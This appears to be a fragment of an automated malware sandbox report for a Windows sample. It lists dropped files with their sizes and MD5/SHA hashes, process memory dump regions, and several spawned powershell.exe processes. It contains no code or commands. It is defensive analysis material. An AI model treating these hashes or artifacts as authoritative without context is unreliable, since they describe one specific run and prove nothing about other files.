8defa71772105fd9128a669f6ff19b6fe47745a0305beb9a8cadb672ed087077f7538cd56e39329f7daa37797a96469eae7cd5e4cca57c9a183b35bdc44182f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28762\base_library.zip

Filesize
1.3MB

MD5
48ba559bf70c3ef963f86633530667d6

SHA1
e3319e3a70590767ad00290230d77158f8f8307e

SHA256
f8377aa03b7036e7735e2814452c1759ab7ceec3f8f8a202b697b4132809ce5e

SHA512
567a7bef4a7c7ff0890708c0e62d2af748b645c8b9071953873b0dd5aa789c42796860896a6b5e539651de9a2243338e2a5fb47743c30dfcde59b1787c4c1871

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28762\python312.dll

Filesize
6.6MB

MD5
cae8fa4e7cb32da83acf655c2c39d9e1

SHA1
7a0055588a2d232be8c56791642cb0f5abbc71f8

SHA256
8ad53c67c2b4db4387d5f72ee2a3ca80c40af444b22bf41a6cfda2225a27bb93

SHA512
db2190da2c35bceed0ef91d7553ff0dea442286490145c3d0e89db59ba1299b0851e601cc324b5f7fd026414fc73755e8eff2ef5fb5eeb1c54a9e13e7c66dd0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28762\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wzebhppf.kzx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/364-790-0x00007FF6CF9E0000-0x00007FF6CFA4C000-memory.dmp

Filesize
432KB

Download
memory/1172-982-0x0000000000390000-0x0000000000606000-memory.dmp

Filesize
2.5MB

Download
memory/1172-792-0x0000000025630000-0x000000002588F000-memory.dmp

Filesize
2.4MB

Download
memory/1172-682-0x0000000000390000-0x0000000000606000-memory.dmp

Filesize
2.5MB

Download
memory/2164-1026-0x000000006EC30000-0x000000006EC7C000-memory.dmp

Filesize
304KB

Download
memory/2164-1047-0x00000000071D0000-0x00000000071E4000-memory.dmp

Filesize
80KB

Download
memory/2164-1020-0x0000000005550000-0x00000000058A4000-memory.dmp

Filesize
3.3MB

Download
memory/2164-1025-0x0000000005D00000-0x0000000005D4C000-memory.dmp

Filesize
304KB

Download
memory/2164-1036-0x0000000006E50000-0x0000000006EF3000-memory.dmp

Filesize
652KB

Download
memory/2164-1037-0x0000000007190000-0x00000000071A1000-memory.dmp

Filesize
68KB

Download
memory/2340-1059-0x00007FF716370000-0x00007FF716B5F000-memory.dmp

Filesize
7.9MB

Download
memory/2388-655-0x0000000003A70000-0x0000000003AE3000-memory.dmp

Filesize
460KB

Download
memory/2388-649-0x0000000003A70000-0x0000000003AE3000-memory.dmp

Filesize
460KB

Download
memory/2388-652-0x0000000003A70000-0x0000000003AE3000-memory.dmp

Filesize
460KB

Download
memory/2388-650-0x0000000003A70000-0x0000000003AE3000-memory.dmp

Filesize
460KB

Download
memory/2388-651-0x0000000003A70000-0x0000000003AE3000-memory.dmp

Filesize
460KB

Download
memory/2388-654-0x0000000003A70000-0x0000000003AE3000-memory.dmp

Filesize
460KB

Download
memory/2388-653-0x0000000003A70000-0x0000000003AE3000-memory.dmp

Filesize
460KB

Download
memory/2404-923-0x00007FF6F5D00000-0x00007FF6F6297000-memory.dmp

Filesize
5.6MB

Download
memory/2564-1052-0x00007FF604280000-0x00007FF604817000-memory.dmp

Filesize
5.6MB

Download
memory/2876-699-0x00007FF6CF9E0000-0x00007FF6CFA4C000-memory.dmp

Filesize
432KB

Download
memory/2876-791-0x00007FF6CF9E0000-0x00007FF6CFA4C000-memory.dmp

Filesize
432KB

Download
memory/2968-985-0x00007FF68B600000-0x00007FF68B629000-memory.dmp

Filesize
164KB

Download
memory/2968-1010-0x00007FF68B600000-0x00007FF68B629000-memory.dmp

Filesize
164KB

Download
memory/2968-1058-0x00007FF68B600000-0x00007FF68B629000-memory.dmp

Filesize
164KB

Download
memory/3240-910-0x0000020266AC0000-0x0000020266AE2000-memory.dmp

Filesize
136KB

Download
memory/4072-952-0x00007FF604280000-0x00007FF604817000-memory.dmp

Filesize
5.6MB

Download
memory/4084-954-0x00007FF63CEF0000-0x00007FF63D6DF000-memory.dmp

Filesize
7.9MB

Download
memory/4084-953-0x0000024C4FF30000-0x0000024C4FF50000-memory.dmp

Filesize
128KB

Download
memory/4676-848-0x0000000000660000-0x0000000000666000-memory.dmp

Filesize
24KB

Download
memory/4800-0-0x00000000745FE000-0x00000000745FF000-memory.dmp

Filesize
4KB

Download
memory/4800-627-0x00000000745F0000-0x0000000074DA0000-memory.dmp

Filesize
7.7MB

Download
memory/4800-591-0x00000000745FE000-0x00000000745FF000-memory.dmp

Filesize
4KB

Download
memory/4800-3-0x00000000745F0000-0x0000000074DA0000-memory.dmp

Filesize
7.7MB

Download
memory/4800-2-0x0000000004A50000-0x0000000004AEC000-memory.dmp

Filesize
624KB

Download
memory/4800-1-0x00000000001A0000-0x00000000001A8000-memory.dmp

Filesize
32KB

Download
memory/4876-832-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/4876-833-0x00000000059F0000-0x0000000005F94000-memory.dmp

Filesize
5.6MB

Download
memory/4876-834-0x0000000006350000-0x00000000063A0000-memory.dmp

Filesize
320KB

Download
memory/4876-835-0x0000000006440000-0x00000000064D2000-memory.dmp

Filesize
584KB

Download
memory/4876-836-0x00000000063E0000-0x00000000063EA000-memory.dmp

Filesize
40KB

Download
memory/5024-965-0x0000000006060000-0x00000000060AC000-memory.dmp

Filesize
304KB

Download
memory/5024-964-0x0000000005B20000-0x0000000005E74000-memory.dmp

Filesize
3.3MB

Download
memory/5024-978-0x0000000007540000-0x0000000007554000-memory.dmp

Filesize
80KB

Download
memory/5024-977-0x0000000007500000-0x0000000007511000-memory.dmp

Filesize
68KB

Download
memory/5024-976-0x0000000007200000-0x00000000072A3000-memory.dmp

Filesize
652KB

Download
memory/5024-966-0x000000006E1C0000-0x000000006E20C000-memory.dmp

Filesize
304KB

Download
memory/5044-513-0x0000000005EE0000-0x0000000005F2C000-memory.dmp

Filesize
304KB

Download
memory/5044-539-0x0000000006EB0000-0x0000000006F53000-memory.dmp

Filesize
652KB

Download
memory/5044-512-0x0000000005EC0000-0x0000000005EDE000-memory.dmp

Filesize
120KB

Download
memory/5044-494-0x00000000056B0000-0x0000000005716000-memory.dmp

Filesize
408KB

Download
memory/5044-493-0x0000000004FA0000-0x0000000005006000-memory.dmp

Filesize
408KB

Download
memory/5044-492-0x0000000004F00000-0x0000000004F22000-memory.dmp

Filesize
136KB

Download
memory/5044-490-0x00000000028D0000-0x0000000002906000-memory.dmp

Filesize
216KB

Download
memory/5044-491-0x0000000005080000-0x00000000056A8000-memory.dmp

Filesize
6.2MB

Download
memory/5044-523-0x000000006F020000-0x000000006F06C000-memory.dmp

Filesize
304KB

Download
memory/5044-522-0x0000000006E70000-0x0000000006EA2000-memory.dmp

Filesize
200KB

Download
memory/5044-535-0x0000000006490000-0x00000000064AE000-memory.dmp

Filesize
120KB

Download
memory/5044-504-0x0000000005860000-0x0000000005BB4000-memory.dmp

Filesize
3.3MB

Download
memory/5044-552-0x0000000007890000-0x0000000007F0A000-memory.dmp

Filesize
6.5MB

Download
memory/5044-553-0x00000000071E0000-0x00000000071FA000-memory.dmp

Filesize
104KB

Download
memory/5044-607-0x0000000007250000-0x000000000725A000-memory.dmp

Filesize
40KB

Download
memory/5044-619-0x0000000007460000-0x00000000074F6000-memory.dmp

Filesize
600KB

Download
memory/5044-624-0x0000000007400000-0x0000000007411000-memory.dmp

Filesize
68KB

Download
memory/5044-628-0x0000000007420000-0x000000000742E000-memory.dmp

Filesize
56KB

Download
memory/5044-629-0x0000000007430000-0x0000000007444000-memory.dmp

Filesize
80KB

Download
memory/5044-630-0x0000000007520000-0x000000000753A000-memory.dmp

Filesize
104KB

Download
memory/5044-631-0x0000000007500000-0x0000000007508000-memory.dmp

Filesize
32KB

Download

pid	process
5044	powershell.exe
5024	powershell.exe
2164	powershell.exe
940	powershell.exe
3240	powershell.exe
4984	powershell.exe
540	powershell.exe